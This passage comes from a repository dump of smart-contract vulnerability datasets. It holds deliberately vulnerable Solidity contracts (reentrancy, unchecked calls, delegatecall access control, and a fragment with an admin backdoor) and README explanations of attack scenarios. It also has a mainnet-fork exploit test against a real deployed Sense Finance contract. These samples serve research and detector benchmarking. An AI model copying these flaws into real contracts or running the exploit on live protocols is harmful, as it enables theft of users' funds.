sload(2) 49 | } 50 | } 51 | 52 | function pickWinner(address random) safeCheck public { 53 | assembly { 54 | // admin backddoor which can set winner address 55 | sstore(1, random) 56 | } 57 | } 58 | 59 | function getkWinner() public view returns(address) { 60 | console.log("Current winner: ",winner); 61 | return winner; 62 | 63 | } 64 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 54 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract PRIVATE_ETH_CELL 10 | { 11 | mapping (address=>uint256) public balances; 12 | 13 | uint public MinSum; 14 | 15 | LogFile Log; 16 | 17 | bool intitalized; 18 | 19 | function SetMinSum(uint _val) 20 | public 21 | { 22 | require(!intitalized); 23 | MinSum = _val; 24 | } 25 | 26 | function SetLogFile(address _log) 27 | public 28 | { 29 | require(!intitalized); 30 | Log = LogFile(_log); 31 | } 32 | 33 | function Initialized() 34 | public 35 | { 36 | intitalized = true; 37 | } 38 | 39 | function Deposit() 40 | public 41 | payable 42 | { 43 | balances[msg.sender]+= msg.value; 44 | Log.AddMessage(msg.sender,msg.value,"Put"); 45 | } 46 | 47 | function Collect(uint _am) 48 | public 49 | payable 50 | { 51 | if(balances[msg.sender]>=MinSum && balances[msg.sender]>=_am) 52 | { 53 | // REENTRANCY 54 | if(msg.sender.call.value(_am)()) 55 | { 56 | balances[msg.sender]-=_am; 57 | Log.AddMessage(msg.sender,_am,"Collect"); 58 | } 59 | } 60 | } 61 | 62 | function() 63 | public 64 | payable 65 | { 66 | Deposit(); 67 | } 68 | 69 | } 70 | 71 | 72 | 73 | contract LogFile 74 | { 75 | struct Message 76 | { 77 | address Sender; 78 | string Data; 79 | uint Val; 80 | uint Time; 81 | } 82 | 83 | Message[] public History; 84 | 85 | Message LastMsg; 86 | 87 | function AddMessage(address _adr,uint _val,string _data) 88 | public 89 | { 90 | LastMsg.Sender = _adr; 91 | LastMsg.Time = now; 92 | LastMsg.Val = _val; 93 | LastMsg.Data = _data; 94 | History.push(LastMsg); 95 | } 96 | } -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/DataLocation.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | /* 7 | Description: 8 | Misuse of storage and memory references of the user in the updaterewardDebt function. 9 | 10 | Recommendation: 11 | Ensure the correct usage of memory and storage in the function parameters. Make all the locations explicit. 12 | 13 | Real case: cover protocol: https://mudit.blog/cover-protocol-hack-analysis-tokens-minted-exploit/ 14 | Storage vs. memory in Solidity: https://www.educative.io/answers/storage-vs-memory-in-solidity 15 | */ 16 | 17 | contract ContractTest is Test { 18 | Array ArrayContract; 19 | 20 | function testDataLocation() public { 21 | address alice = vm.addr(1); 22 | address bob = vm.addr(2); 23 | vm.deal(address(alice), 1 ether); 24 | vm.deal(address(bob), 1 ether); 25 | //vm.startPrank(alice); 26 | ArrayContract = new Array(); 27 | ArrayContract.updaterewardDebt(100); // update rewardDebt to 100 28 | (uint amount, uint rewardDebt)= ArrayContract.userInfo(address(this)); 29 | console.log("Non-updated rewardDebt",rewardDebt ); 30 | 31 | console.log("Update rewardDebt with storage"); 32 | ArrayContract.fixedupdaterewardDebt(100); 33 | (uint newamount, uint newrewardDebt)= ArrayContract.userInfo(address(this)); 34 | console.log("Updated rewardDebt",newrewardDebt ); 35 | } 36 | receive() payable external{} 37 | } 38 | 39 | contract Array is Test { 40 | mapping (address => UserInfo) public userInfo; // storage 41 | 42 | struct UserInfo{ 43 | uint256 amount; // How many tokens got staked by user. 44 | uint256 rewardDebt; // Reward debt. See Explanation below. 45 | } 46 | 47 | function updaterewardDebt(uint amount) public { 48 | UserInfo memory user = userInfo[msg.sender]; // memory, vulnerable point 49 | user.rewardDebt = amount; 50 | } 51 | function fixedupdaterewardDebt(uint amount) public { 52 | UserInfo storage user = userInfo[msg.sender]; // storage 53 | user.rewardDebt = amount; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/FibonacciBalance.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/sigp/solidity-security-blog 3 | * @author: Suhabe Bugrara 4 | * @vulnerable_at_lines: 31,38 5 | */ 6 | 7 | //added pragma version 8 | pragma solidity ^0.4.0; 9 | 10 | contract FibonacciBalance { 11 | 12 | address public fibonacciLibrary; 13 | // the current fibonacci number to withdraw 14 | uint public calculatedFibNumber; 15 | // the starting fibonacci sequence number 16 | uint public start = 3; 17 | uint public withdrawalCounter; 18 | // the fibonancci function selector 19 | bytes4 constant fibSig = bytes4(sha3("setFibonacci(uint256)")); 20 | 21 | // constructor - loads the contract with ether 22 | constructor(address _fibonacciLibrary) public payable { 23 | fibonacciLibrary = _fibonacciLibrary; 24 | } 25 | 26 | function withdraw() { 27 | withdrawalCounter += 1; 28 | // calculate the fibonacci number for the current withdrawal user 29 | // this sets calculatedFibNumber 30 | // ACCESS_CONTROL 31 | require(fibonacciLibrary.delegatecall(fibSig, withdrawalCounter)); 32 | msg.sender.transfer(calculatedFibNumber * 1 ether); 33 | } 34 | 35 | // allow users to call fibonacci library functions 36 | function() public { 37 | // ACCESS_CONTROL 38 | require(fibonacciLibrary.delegatecall(msg.data)); 39 | } 40 | } 41 | 42 | // library contract - calculates fibonacci-like numbers; 43 | contract FibonacciLib { 44 | // initializing the standard fibonacci sequence; 45 | uint public start; 46 | uint public calculatedFibNumber; 47 | 48 | // modify the zeroth number in the sequence 49 | function setStart(uint _start) public { 50 | start = _start; 51 | } 52 | 53 | function setFibonacci(uint n) public { 54 | calculatedFibNumber = fibonacci(n); 55 | } 56 | 57 | function fibonacci(uint n) internal returns (uint) { 58 | if (n == 0) return start; 59 | else if (n == 1) return start + 1; 60 | else return fibonacci(n - 1) + fibonacci(n - 2); 61 | } 62 | } 63 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/README.md: -------------------------------------------------------------------------------- 1 | # Reentrancy 2 | Also known as or related to race to empty, recursive call vulnerability, call to the unknown. 3 | 4 | The Reentrancy attack, probably the most famous Ethereum vulnerability,surprised everyone when discovered for the first time. It was first unveiled during a multimillion dollar heist which led to a hard fork of Ethereum. Reentrancy occurs when external contract calls are allowed to make new calls to the calling contract before the initial execution is complete. For a function, this means that the contract state may change in the middle of its execution as a result of a call to an untrusted contract or the use of a low level function with an external address. 5 | 6 | Loss: estimated at 3.5M ETH (~50M USD at the time) 7 | 8 | ## Attack Scenario 9 | A smart contract tracks the balance of a number of external addresses and allows users to retrieve funds with its public withdraw() function. 10 | A malicious smart contract uses the withdraw() function to retrieve its entire balance. 11 | The victim contract executes the call.value(amount)() low level function to send the ether to the malicious contract before updating the balance of the malicious contract. 12 | The malicious contract has a payable fallback() function that accepts the funds and then calls back into the victim contract's withdraw() function. 13 | This second execution triggers a transfer of funds: remember, the balance of the malicious contract still hasn't been updated from the first withdrawal. As a result, the malicious contract successfully withdraws its entire balance a second time. 14 | 15 | ## Examples 16 | The following function contains a function vulnerable to a reentrancy attack. When the low level call() function sends ether to the msg.sender address, it becomes vulnerable; if the address is a smart contract, the payment will trigger its fallback function with what's left of the transaction gas: 17 | ``` 18 | function withdraw(uint _amount) { 19 | require(balances[msg.sender] >= _amount); 20 | msg.sender.call.value(_amount)(); 21 | balances[msg.sender] -= _amount; 22 | } 23 | ```` 24 | 25 | ## References 26 | Taken from [DASP TOP10](https://dasp.co/) -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/short_addresses/README.md: -------------------------------------------------------------------------------- 1 | # Short Addresses 2 | Also known as or related to off-chain issues, client vulnerabilities. 3 | 4 | Short address attacks are a side-effect of the EVM itself accepting incorrectly padded arguments. Attackers can exploit this by using specially-crafted addresses to make poorly coded clients encode arguments incorrectly before including them in transactions. Is this an EVM issue or a client issue? Should it be fixed in smart contracts instead? While everyone has a different opinion, the fact is that a great deal of ether could be directly impacted by this issue. While this vulnerability has yet to be exploited in the wild, it is a good demonstration of problems arising from the interaction between clients and the Ethereum blockchain. Other off-chain issues exist: an important one is the Ethereum ecosystem's deep trust in specific Javascript front ends, browser plugins and public nodes. An infamous off-chain exploit was used in the hack of the Coindash ICO that modified the company's Ethereum address on their webpage to trick participants into sending ethers to the attacker's address. 5 | 6 | ## Attack Scenario 7 | An exchange API has a trading function that takes a recipient address and an amount. 8 | The API then interacts with the smart contract transfer(address _to, uint256 _amount) function with padded arguments: it prepends the address (of an expected 20-byte length) with 12 zero bytes to make it 32-byte long 9 | Bob (0x3bdde1e9fbaef2579dd63e2abbf0be445ab93f00) asks Alice to transfer him 20 tokens. He maliciously gives her his address truncated to remove the trailing zeroes. 10 | Alice uses the exchange API with the shorter 19-byte address of Bob (0x3bdde1e9fbaef2579dd63e2abbf0be445ab93f). 11 | The API pads the address with 12 zero bytes, making it 31 bytes instead of the 32 bytes. Effectively stealing one byte from the following _amount argument. 12 | Eventually, the EVM executing the smart contract's code will remark that the data is not properly padded and will add the missing byte at the end of the _amount argument. Effectively transfering 256 times more tokens than thought. 13 | 14 | ## References 15 | Taken from [DASP TOP10](https://dasp.co/) -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Dirtybytes.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.0; 3 | 4 | import "forge-std/Test.sol"; 5 | /* 6 | "description": "Copying ``bytes`` arrays from memory or calldata to storage is done in chunks of 32 bytes even if the length is not a multiple of 32. 7 | Thereby, extra bytes past the end of the array may be copied from calldata or memory to storage. 8 | These dirty bytes may then become observable after a ``.push()`` without arguments to the bytes array in storage, 9 | i.e. such a push will not result in a zero value at the end of the array as expected. 10 | This bug only affects the legacy code generation pipeline, the new code generation pipeline via IR is not affected." 11 | 12 | "link": https://blog.soliditylang.org/2022/06/15/dirty-bytes-array-to-storage-bug/ 13 | "fixed": 0.8.15 14 | 15 | */ 16 | 17 | contract ContractTest is Test { 18 | Dirtybytes Dirtybytesontract; 19 | 20 | function testDirtybytes() public { 21 | 22 | Dirtybytesontract = new Dirtybytes(); 23 | emit log_named_bytes("Array element in h() not being zero::",Dirtybytesontract.h()); 24 | console.log("Such that the byte after the 63 bytes allocated below will be 0x02."); 25 | 26 | } 27 | 28 | } 29 | contract Dirtybytes { 30 | event ev(uint[], uint); 31 | bytes s; 32 | constructor() { 33 | // The following event emission involves writing to temporary memory at the current location 34 | // of the free memory pointer. Several other operations (e.g. certain keccak256 calls) will 35 | // use temporary memory in a similar manner. 36 | // In this particular case, the length of the passed array will be written to temporary memory 37 | // exactly such that the byte after the 63 bytes allocated below will be 0x02. This dirty byte 38 | // will then be written to storage during the assignment and become visible with the push in ``h``. 39 | emit ev(new uint[](2), 0); 40 | bytes memory m = new bytes(63); 41 | s = m; 42 | } 43 | function h() external returns (bytes memory) { 44 | s.push(); 45 | return s; 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 54 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract PERSONAL_BANK 10 | { 11 | mapping (address=>uint256) public balances; 12 | 13 | uint public MinSum = 1 ether; 14 | 15 | LogFile Log = LogFile(0x0486cF65A2F2F3A392CBEa398AFB7F5f0B72FF46); 16 | 17 | bool intitalized; 18 | 19 | function SetMinSum(uint _val) 20 | public 21 | { 22 | if(intitalized)revert(); 23 | MinSum = _val; 24 | } 25 | 26 | function SetLogFile(address _log) 27 | public 28 | { 29 | if(intitalized)revert(); 30 | Log = LogFile(_log); 31 | } 32 | 33 | function Initialized() 34 | public 35 | { 36 | intitalized = true; 37 | } 38 | 39 | function Deposit() 40 | public 41 | payable 42 | { 43 | balances[msg.sender]+= msg.value; 44 | Log.AddMessage(msg.sender,msg.value,"Put"); 45 | } 46 | 47 | function Collect(uint _am) 48 | public 49 | payable 50 | { 51 | if(balances[msg.sender]>=MinSum && balances[msg.sender]>=_am) 52 | { 53 | // REENTRANCY 54 | if(msg.sender.call.value(_am)()) 55 | { 56 | balances[msg.sender]-=_am; 57 | Log.AddMessage(msg.sender,_am,"Collect"); 58 | } 59 | } 60 | } 61 | 62 | function() 63 | public 64 | payable 65 | { 66 | Deposit(); 67 | } 68 | 69 | } 70 | 71 | 72 | 73 | contract LogFile 74 | { 75 | struct Message 76 | { 77 | address Sender; 78 | string Data; 79 | uint Val; 80 | uint Time; 81 | } 82 | 83 | Message[] public History; 84 | 85 | Message LastMsg; 86 | 87 | function AddMessage(address _adr,uint _val,string _data) 88 | public 89 | { 90 | LastMsg.Sender = _adr; 91 | LastMsg.Time = now; 92 | LastMsg.Val = _val; 93 | LastMsg.Data = _data; 94 | History.push(LastMsg); 95 | } 96 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol: -------------------------------------------------------------------------------- 1 | 2 | /* 3 | * @source: etherscan.io 4 | * @author: - 5 | * @vulnerable_at_lines: 55 6 | */ 7 | 8 | pragma solidity ^0.4.19; 9 | 10 | contract ACCURAL_DEPOSIT 11 | { 12 | mapping (address=>uint256) public balances; 13 | 14 | uint public MinSum = 1 ether; 15 | 16 | LogFile Log = LogFile(0x0486cF65A2F2F3A392CBEa398AFB7F5f0B72FF46); 17 | 18 | bool intitalized; 19 | 20 | function SetMinSum(uint _val) 21 | public 22 | { 23 | if(intitalized)revert(); 24 | MinSum = _val; 25 | } 26 | 27 | function SetLogFile(address _log) 28 | public 29 | { 30 | if(intitalized)revert(); 31 | Log = LogFile(_log); 32 | } 33 | 34 | function Initialized() 35 | public 36 | { 37 | intitalized = true; 38 | } 39 | 40 | function Deposit() 41 | public 42 | payable 43 | { 44 | balances[msg.sender]+= msg.value; 45 | Log.AddMessage(msg.sender,msg.value,"Put"); 46 | } 47 | 48 | function Collect(uint _am) 49 | public 50 | payable 51 | { 52 | if(balances[msg.sender]>=MinSum && balances[msg.sender]>=_am) 53 | { 54 | // REENTRANCY 55 | if(msg.sender.call.value(_am)()) 56 | { 57 | balances[msg.sender]-=_am; 58 | Log.AddMessage(msg.sender,_am,"Collect"); 59 | } 60 | } 61 | } 62 | 63 | function() 64 | public 65 | payable 66 | { 67 | Deposit(); 68 | } 69 | 70 | } 71 | 72 | 73 | 74 | contract LogFile 75 | { 76 | struct Message 77 | { 78 | address Sender; 79 | string Data; 80 | uint Val; 81 | uint Time; 82 | } 83 | 84 | Message[] public History; 85 | 86 | Message LastMsg; 87 | 88 | function AddMessage(address _adr,uint _val,string _data) 89 | public 90 | { 91 | LastMsg.Sender = _adr; 92 | LastMsg.Time = now; 93 | LastMsg.Val = _val; 94 | LastMsg.Data = _data; 95 | History.push(LastMsg); 96 | } 97 | } -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/SenseFinance_exp.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! 3 | pragma solidity >=0.7.0 <0.9.0; 4 | 5 | import "forge-std/Test.sol"; 6 | import "./interface.sol"; 7 | 8 | interface ISpace { 9 | function onSwap( 10 | SwapRequest memory request, 11 | uint256 reservesTokenIn, 12 | uint256 reservesTokenOut 13 | ) external returns (uint256); 14 | 15 | struct SwapRequest { 16 | IVault.SwapKind kind; 17 | IERC20 tokenIn; 18 | IERC20 tokenOut; 19 | uint256 amount; 20 | // Misc data 21 | bytes32 poolId; 22 | uint256 lastChangeBlock; 23 | address from; 24 | address to; 25 | bytes userData; 26 | } 27 | } 28 | 29 | interface IVault { 30 | enum SwapKind { 31 | GIVEN_IN, 32 | GIVEN_OUT 33 | } 34 | } 35 | 36 | contract ContractTest is DSTest { 37 | ISpace space = ISpace(0x3f9FEe026fCebb40719A69416C72B714d89a17d9); 38 | IVault.SwapKind kind = IVault.SwapKind(0); 39 | ISpace.SwapRequest aad = 40 | ISpace.SwapRequest( 41 | kind, 42 | IERC20(0x3f9FEe026fCebb40719A69416C72B714d89a17d9), 43 | IERC20(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0), 44 | 2000000000000000000, 45 | 0x3f9fee026fcebb40719a69416c72b714d89a17d900020000000000000000017c, 46 | 15017009, 47 | address(this), 48 | address(this), 49 | "" 50 | ); 51 | CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); 52 | 53 | function setUp() public { 54 | cheats.createSelectFork("mainnet", 15017009); //fork mainnet at block 15017009 55 | } 56 | 57 | function testExploit() public { 58 | //onswap:reservesTokenIn, reservesTokenOut; 59 | emit log_named_uint( 60 | "Amount Calculated:", 61 | space.onSwap( 62 | aad, 63 | 60000000000000000000000000000000, 64 | 20000000000000000000000000 65 | ) 66 | ); //744039785002747962 67 | emit log_named_uint( 68 | "Manipulated Amount Calculated:", 69 | space.onSwap(aad, 2000000000000000000, 2000000000000000000) 70 | ); //1860147027671744844 71 | } 72 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/bad_randomness/README.md: -------------------------------------------------------------------------------- 1 | # Bad Randomness 2 | Also known as nothing is secret. 3 | 4 | Randomness is hard to get right in Ethereum. While Solidity offers functions and variables that can access apparently hard-to-predict values, they are generally either more public than they seem or subject to miners' influence. Because these sources of randomness are to an extent predictable, malicious users can generally replicate it and attack the function relying on its unpredictablility. 5 | 6 | Loss: more than 400 ETH 7 | 8 | ## Attack Scenario 9 | A smart contract uses the block number as a source of randomness for a game. 10 | An attacker creates a malicious contract that checks if the current block number is a winner. If so, it calls the first smart contract in order to win; since the call will be part of the same transaction, the block number will remain the same on both contracts. 11 | The attacker only has to call her malicious contract until it wins. 12 | 13 | ## Examples 14 | In this first example, a private seed is used in combination with an iteration number and the keccak256 hash function to determine if the caller wins. Even though the seed is private, it must have been set via a transaction at some point in time and thus is visible on the blockchain. 15 | ``` 16 | uint256 private seed; 17 | 18 | function play() public payable { 19 | require(msg.value >= 1 ether); 20 | iteration++; 21 | uint randomNumber = uint(keccak256(seed + iteration)); 22 | if (randomNumber % 2 == 0) { 23 | msg.sender.transfer(this.balance); 24 | } 25 | } 26 | ``` 27 | In this second example, block.blockhash is being used to generate a random number. This hash is unknown if the blockNumber is set to the current block.number (for obvious reasons), and is thus set to 0. In the case where the blockNumber is set to more than 256 blocks in the past, it will always be zero. Finally, if it is set to a previous block number that is not too old, another smart contract can access the same number and call the game contract as part of the same transaction. 28 | ``` 29 | function play() public payable { 30 | require(msg.value >= 1 ether); 31 | if (block.blockhash(blockNumber) % 2 == 0) { 32 | msg.sender.transfer(this.balance); 33 | } 34 | } 35 | ``` 36 | 37 | ## References 38 | Taken from [DASP TOP10](https://dasp.co/) -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 94 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract Ownable 10 | { 11 | address newOwner; 12 | address owner = msg.sender; 13 | 14 | function changeOwner(address addr) 15 | public 16 | onlyOwner 17 | { 18 | newOwner = addr; 19 | } 20 | 21 | function confirmOwner() 22 | public 23 | { 24 | if(msg.sender==newOwner) 25 | { 26 | owner=newOwner; 27 | } 28 | } 29 | 30 | modifier onlyOwner 31 | { 32 | if(owner == msg.sender)_; 33 | } 34 | } 35 | 36 | contract Token is Ownable 37 | { 38 | address owner = msg.sender; 39 | function WithdrawToken(address token, uint256 amount,address to) 40 | public 41 | onlyOwner 42 | { 43 | token.call(bytes4(sha3("transfer(address,uint256)")),to,amount); 44 | } 45 | } 46 | 47 | contract TokenBank is Token 48 | { 49 | uint public MinDeposit; 50 | mapping (address => uint) public Holders; 51 | 52 | ///Constructor 53 | function initTokenBank() 54 | public 55 | { 56 | owner = msg.sender; 57 | MinDeposit = 1 ether; 58 | } 59 | 60 | function() 61 | payable 62 | { 63 | Deposit(); 64 | } 65 | 66 | function Deposit() 67 | payable 68 | { 69 | if(msg.value>MinDeposit) 70 | { 71 | Holders[msg.sender]+=msg.value; 72 | } 73 | } 74 | 75 | function WitdrawTokenToHolder(address _to,address _token,uint _amount) 76 | public 77 | onlyOwner 78 | { 79 | if(Holders[_to]>0) 80 | { 81 | Holders[_to]=0; 82 | WithdrawToken(_token,_amount,_to); 83 | } 84 | } 85 | 86 | function WithdrawToHolder(address _addr, uint _wei) 87 | public 88 | onlyOwner 89 | payable 90 | { 91 | if(Holders[_addr]>0) 92 | { 93 | // REENTRANCY 94 | if(_addr.call.value(_wei)()) 95 | { 96 | Holders[_addr]-=_wei; 97 | } 98 | } 99 | } 100 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 44 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract Ownable 10 | { 11 | address newOwner; 12 | address owner = msg.sender; 13 | 14 | function changeOwner(address addr) 15 | public 16 | onlyOwner 17 | { 18 | newOwner = addr; 19 | } 20 | 21 | function confirmOwner() 22 | public 23 | { 24 | if(msg.sender==newOwner) 25 | { 26 | owner=newOwner; 27 | } 28 | } 29 | 30 | modifier onlyOwner 31 | { 32 | if(owner == msg.sender)_; 33 | } 34 | } 35 | 36 | contract Token is Ownable 37 | { 38 | address owner = msg.sender; 39 | function WithdrawToken(address token, uint256 amount,address to) 40 | public 41 | onlyOwner 42 | { 43 | // UNCHECKED_LL_CALLS 44 | token.call(bytes4(sha3("transfer(address,uint256)")),to,amount); 45 | } 46 | } 47 | 48 | contract TokenBank is Token 49 | { 50 | uint public MinDeposit; 51 | mapping (address => uint) public Holders; 52 | 53 | ///Constructor 54 | function initTokenBank() 55 | public 56 | { 57 | owner = msg.sender; 58 | MinDeposit = 1 ether; 59 | } 60 | 61 | function() 62 | payable 63 | { 64 | Deposit(); 65 | } 66 | 67 | function Deposit() 68 | payable 69 | { 70 | if(msg.value>MinDeposit) 71 | { 72 | Holders[msg.sender]+=msg.value; 73 | } 74 | } 75 | 76 | function WitdrawTokenToHolder(address _to,address _token,uint _amount) 77 | public 78 | onlyOwner 79 | { 80 | if(Holders[_to]>0) 81 | { 82 | Holders[_to]=0; 83 | WithdrawToken(_token,_amount,_to); 84 | } 85 | } 86 | 87 | function WithdrawToHolder(address _addr, uint _wei) 88 | public 89 | onlyOwner 90 | payable 91 | { 92 | if(Holders[_addr]>0) 93 | { 94 | if(_addr.call.value(_wei)()) 95 | { 96 | Holders[_addr]-=_wei; 97 | } 98 | } 99 | } 100 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/README.md: -------------------------------------------------------------------------------- 1 | # Arithmetic 2 | Also known as integer overflow and integer underflow. 3 | 4 | Integer overflows and underflows are not a new class of vulnerability, but they are especially dangerous in smart contracts, where unsigned integers are prevalent and most developers are used to simple int types (which are often just signed integers). If overflows occur, many benign-seeming codepaths become vectors for theft or denial of service. 5 | 6 | ## Attack Scenario 7 | A smart contract's withdraw() function allows you to retrieve ether donated to the contract as long as your balance remains positive after the operation. 8 | An attacker attempts to withdraw more than his or her current balance. 9 | The withdraw() function check's result is always a positive amount, allowing the attacker to withdraw more than allowed. The resulting balance underflows and becomes an order of magnitude larger than it should be. 10 | 11 | ## Examples 12 | The most straightforward example is a function that does not check for integer underflow, allowing you to withdraw an infinite amount of tokens: 13 | ``` 14 | function withdraw(uint _amount) { 15 | require(balances[msg.sender] - _amount > 0); 16 | msg.sender.transfer(_amount); 17 | balances[msg.sender] -= _amount; 18 | } 19 | ``` 20 | The second example (spotted during the Underhanded Solidity Coding Contest) is an off-by-one error facilitated by the fact that an array's length is represented by an unsigned integer: 21 | ``` 22 | function popArrayOfThings() { 23 | require(arrayOfThings.length >= 0); 24 | arrayOfThings.length--; 25 | } 26 | ``` 27 | The third example is a variant of the first example, where the result of arithmetic on two unsigned integers is an unsigned integer: 28 | ``` 29 | function votes(uint postId, uint upvote, uint downvotes) { 30 | if (upvote - downvote < 0) { 31 | deletePost(postId) 32 | } 33 | } 34 | ``` 35 | The fourth example features the soon-to-be-deprecated var keyword. Because var will change itself to the smallest type needed to contain the assigned value, it will become an uint8 to hold the value 0. If the loop is meant to iterate more than 255 times, it will never reach that number and will stop when the execution runs out of gas: 36 | ``` 37 | for (var i = 0; i < somethingLarge; i ++) { 38 | // ... 39 | } 40 | ``` 41 | 42 | ## References 43 | Taken from [DASP TOP10](https://dasp.co/) -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Immunefi_ch2.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | import "@openzeppelin/contracts/utils/Address.sol"; 6 | import "@openzeppelin/contracts/utils/StorageSlot.sol"; 7 | import "@openzeppelin/contracts/access/Ownable.sol"; 8 | import "@openzeppelin/contracts/proxy/utils/Initializable.sol"; 9 | 10 | //#SpotTheBugChallenge 11 | //https://twitter.com/immunefi/status/1562858386244665348?s=21&t=d7_HtNra5AGuNmzVtv9uKg 12 | interface imp{ 13 | function initialize(address) external; 14 | } 15 | 16 | 17 | contract ContractTest is Test { 18 | Proxy ProxyContract; 19 | Implementation ImplementationContract; 20 | 21 | function testChallenge() public { 22 | 23 | ImplementationContract = new Implementation(); 24 | console.log("ImplementationContract addr",address(ImplementationContract)); 25 | ProxyContract = new Proxy(address(ImplementationContract)); 26 | 27 | emit log_named_bytes32("Storage slot 0:",vm.load(address(ProxyContract),bytes32(uint256(0)))); 28 | 29 | } 30 | } 31 | contract Proxy { 32 | //bytes32 constant internal _IMPLEMENTATION_SLOT = keccak256("where.bug.ser"); //correct pattern. 33 | bytes32 internal _IMPLEMENTATION_SLOT = keccak256("where.bug.ser"); // wrong 34 | 35 | constructor(address implementation){ 36 | _setImplementation(address(0)); 37 | Address.functionDelegateCall(implementation, abi.encodeWithSignature("initialize(address)", msg.sender)); 38 | 39 | } 40 | fallback() external payable{ 41 | address implementation = _getImplementation(); 42 | Address.functionDelegateCall(implementation, msg.data); 43 | } 44 | 45 | function _setImplementation(address newImplementation) private { 46 | //require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract"); 47 | StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value = newImplementation; 48 | } 49 | function _getImplementation() public view returns (address) { 50 | return StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value; 51 | } 52 | 53 | } 54 | 55 | contract Implementation is Ownable, Initializable{ 56 | // function initialize(address owner) external { //test purpose 57 | function initialize(address owner) external initializer{ 58 | _transferOwnership(owner); 59 | } 60 | } 61 | 62 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 63 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract PENNY_BY_PENNY 10 | { 11 | struct Holder 12 | { 13 | uint unlockTime; 14 | uint balance; 15 | } 16 | 17 | mapping (address => Holder) public Acc; 18 | 19 | uint public MinSum; 20 | 21 | LogFile Log; 22 | 23 | bool intitalized; 24 | 25 | function SetMinSum(uint _val) 26 | public 27 | { 28 | if(intitalized)throw; 29 | MinSum = _val; 30 | } 31 | 32 | function SetLogFile(address _log) 33 | public 34 | { 35 | if(intitalized)throw; 36 | Log = LogFile(_log); 37 | } 38 | 39 | function Initialized() 40 | public 41 | { 42 | intitalized = true; 43 | } 44 | 45 | function Put(uint _lockTime) 46 | public 47 | payable 48 | { 49 | var acc = Acc[msg.sender]; 50 | acc.balance += msg.value; 51 | if(now+_lockTime>acc.unlockTime)acc.unlockTime=now+_lockTime; 52 | Log.AddMessage(msg.sender,msg.value,"Put"); 53 | } 54 | 55 | function Collect(uint _am) 56 | public 57 | payable 58 | { 59 | var acc = Acc[msg.sender]; 60 | if( acc.balance>=MinSum && acc.balance>=_am && now>acc.unlockTime) 61 | { 62 | // REENTRANCY 63 | if(msg.sender.call.value(_am)()) 64 | { 65 | acc.balance-=_am; 66 | Log.AddMessage(msg.sender,_am,"Collect"); 67 | } 68 | } 69 | } 70 | 71 | function() 72 | public 73 | payable 74 | { 75 | Put(0); 76 | } 77 | 78 | } 79 | 80 | 81 | contract LogFile 82 | { 83 | struct Message 84 | { 85 | address Sender; 86 | string Data; 87 | uint Val; 88 | uint Time; 89 | } 90 | 91 | Message[] public History; 92 | 93 | Message LastMsg; 94 | 95 | function AddMessage(address _adr,uint _val,string _data) 96 | public 97 | { 98 | LastMsg.Sender = _adr; 99 | LastMsg.Time = now; 100 | LastMsg.Val = _val; 101 | LastMsg.Data = _data; 102 | History.push(LastMsg); 103 | } 104 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 63 